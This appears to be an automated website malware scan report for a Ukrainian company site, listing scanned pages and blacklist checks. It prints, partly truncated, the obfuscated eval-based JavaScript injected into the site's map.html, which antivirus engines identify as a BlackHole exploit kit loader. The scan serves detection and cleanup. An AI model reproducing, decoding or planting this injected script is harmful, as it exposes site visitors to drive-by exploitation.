New scan:

Malware Scanner report for bmsltd.com.ua

Malicious/Suspicious/Total urls checked
1/0/15
1 page has malicious code. See details below
Blacklists
OK
Malicious Redirects
OK
Malicious/Hidden/Total iFrames
0/0/0
Deface / Content modification
OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

  • Malware Removal
  • Blacklists Removal
  • Reason Eliminating
  • 1 Month Hack Insurance

More details

Website Hack Insurance

  • Files & DB Monitoring
  • Daily Backups
  • Malware & Hack Detection
  • Unlimited Hack Repairs

More details

Scanned pages/files

RequestServer responseStatus
http://www.bmsltd.com.ua/
200 OK
Content-Length: 7388
Content-Type: text/html
clean
http://www.bmsltd.com.ua/index.php
200 OK
Content-Length: 7388
Content-Type: text/html
clean
http://www.bmsltd.com.ua/products.php
200 OK
Content-Length: 11083
Content-Type: text/html
clean
http://www.bmsltd.com.ua/manuals.php
200 OK
Content-Length: 7873
Content-Type: text/html
clean
http://www.bmsltd.com.ua/contacts.php
200 OK
Content-Length: 10119
Content-Type: text/html
clean
http://www.bmsltd.com.ua/sitemap.php
200 OK
Content-Length: 6256
Content-Type: text/html
clean
http://www.bmsltd.com.ua/basis.php
200 OK
Content-Length: 6706
Content-Type: text/html
clean
http://www.bmsltd.com.ua/?num=1
200 OK
Content-Length: 7388
Content-Type: text/html
clean
http://www.bmsltd.com.ua/test404page.js
404 Not Found
Content-Length: 400
Content-Type: text/html
clean
http://www.bmsltd.com.ua/unost.php
200 OK
Content-Length: 17550
Content-Type: text/html
clean
http://www.bmsltd.com.ua/grizly.php
200 OK
Content-Length: 20509
Content-Type: text/html
clean
http://www.bmsltd.com.ua/register.php
200 OK
Content-Length: 6140
Content-Type: text/html
clean
http://www.bmsltd.com.ua/history.php
200 OK
Content-Length: 6284
Content-Type: text/html
clean
http://www.bmsltd.com.ua/map.html
200 OK
Content-Length: 5256
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)

tmg="y";ehr="d"+"o"+"c"+"ument";try{+function(){if(document.querySelector)++(window[ehr].body)==null}()}catch(joqg){khcj=function(pzdfke){pzdfke="fr"+"omCh"+pzdfke;for(fwfk=0;fwfk<tmg.length;fwfk++){sbhwn+=String[pzdfke](krop(smee+(tmg[fwfk]))-(50));}};};krop=(eval);smee="0x";qlk=0;try{;}catch(gyvy){qlk=1}if(!qlk){try{++krop(ehr)["\x62o"+"d"+tmg]}catch(joqg){mxs="^";}tmg="52^98^a7^a0^95^a6^9b^a1^a0^52^a1^a0^a9^ab^a1^62^6b^5a^5b^52^ad^3f^3c^52^a8^93^a4^52^a5^a6^93^a6^9b^95^6f^59^93^9c^93^aa^59
... 3714 bytes are skipped ...
^9e^97^a0^5e^52^97^a0^96^52^5b^52^5b^6d^3f^3c^af^3f^3c^9b^98^52^5a^a0^93^a8^9b^99^93^a6^a1^a4^60^95^a1^a1^9d^9b^97^77^a0^93^94^9e^97^96^5b^3f^3c^ad^3f^3c^9b^98^5a^79^97^a6^75^a1^a1^9d^9b^97^5a^59^a8^9b^a5^9b^a6^97^96^91^a7^a3^59^5b^6f^6f^67^67^5b^ad^af^97^9e^a5^97^ad^85^97^a6^75^a1^a1^9d^9b^97^5a^59^a8^9b^a5^9b^a6^97^96^91^a7^a3^59^5e^52^59^67^67^59^5e^52^59^63^59^5e^52^59^61^59^5b^6d^3f^3c^3f^3c^a1^a0^a9^ab^a1^62^6b^5a^5b^6d^3f^3c^af^3f^3c^af".split(mxs);sbhwn="";khcj("arCode");krop(""+sbhwn);}

Antivirus reports:

AntiVir
JS/Blacole.NY.7
Avast
JS:Decode-BFW [Trj]
Ad-Aware
JS:Exploit.BlackHole.BN
nProtect
JS:Exploit.BlackHole.BN
TrendMicro-HouseCall
TROJ_GEN.F47V1230
Comodo
TrojWare.JS.iFrame.D
Emsisoft
JS:Exploit.BlackHole.BN (B)
McAfee-GW-Edition
JS/Exploit-Blacole.gc
Microsoft
Exploit:JS/Blacole.NY
Kaspersky
Trojan-Downloader.JS.Iframe.det
MicroWorld-eScan
JS:Exploit.BlackHole.BN
Fortinet
JS/Kryptik.HOL!tr
McAfee
JS/Exploit-Blacole.gc
NANO-Antivirus
Trojan.Script.Expack.chwlwn
F-Secure
JS:Exploit.BlackHole.BN
AVG
Script/Exploit.Kit
Norman
Blacole.WU
GData
JS:Exploit.BlackHole.BN
BitDefender
JS:Exploit.BlackHole.BN

http://www.bmsltd.com.ua/basis.php?num=0
200 OK
Content-Length: 6706
Content-Type: text/html
clean

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: bmsltd.com.ua

Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: bmsltd.com.ua
Referer: http://www.google.com/search?q=bmsltd.com.ua

Result:
The result is similar to the first query. There are no suspicious redirects found.

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=bmsltd.com.ua

Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://bmsltd.com.ua/

Result: bmsltd.com.ua is not infected or malware details are not published yet.